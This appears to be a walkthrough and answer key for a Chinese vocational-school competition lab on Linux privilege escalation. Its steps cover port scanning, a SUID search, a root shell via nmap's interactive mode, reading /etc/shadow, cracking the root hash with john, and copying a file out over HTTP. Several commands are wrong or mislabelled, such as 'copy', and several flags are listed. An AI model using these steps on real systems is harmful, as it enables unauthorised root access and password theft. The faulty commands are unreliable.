2023年中职“网络安全“—Linux系统渗透提权③

Linux系统渗透提权

任务环境说明：

• 服务器场景：Server2202（关闭链接）
• 用户名：hacker密码：123456

1. 使用渗透机对服务器信息收集，并将服务器中SSH服务端口号作为flag提交；

nmap -p- -sV -T4 -n 靶机IP
# -p- 全部端口
# -sV 版本探测
# -T4 针对TCP端口禁止动态扫描延迟超过10ms
# -n 不做DNS解析
1
2
3
4
5

flag: 22/tcp

2. 使用渗透机对服务器信息收集，并将服务器中主机名称作为flag提交；

uname -a            # 输出操作系统信息
1

flag: Kiowizity

3. 使用渗透机对服务器信息收集，并将服务器中系统内核版本作为flag提交；

uname -a            # 输出操作系统信息
1

flag: 3.13.0-45-generic

4. 使用渗透机对服务器管理员提权，并将服务器中root目录下的文本内容作为flag提交；

ls /root
cat /root/adftutij.txt
1
2

flag: hyjufk983

5. 使用渗透机对服务器管理员提权，并将服务器中root的密码作为flag提交；

find / -perm -u=s -type f 2>/dev/null
# find 查找命令
# / 从根目录开始
# -perm 查找权限
# -u=s 有suid权限的文件
# -type 文件类型
# -f 普通文件
# 2 标准错误输出
# > 输
# /dev/null 空设备文件
1
2
3
4
5
6
7
8
9
10

nmap --interactive        # 进入nmap交互模式
!sh                       # 执行sh
id                        # 查看id
cat /etc/shadow           # shadow 文件保存密码
1
2
3
4

vim hash        # 把root信息行写入进去
cat hash        # 查看是否赋值成功
john hash       # 破解hash
1
2
3

flag: 0987654321

6. 使用渗透机对服务器管理员提权，并将服务器中root目录下的图片内容作为flag提交。

pwd                                # 查看当前目录
copy /root/flag.jpg flag.jpg       # 复制过来
python -m SimpleHTTPServer 8080    # 在8080端口开启一个HTTP服务
1
2
3

注意一定要加:8080 指定HTTP端口
1

flag: 2022_year_Skill_competition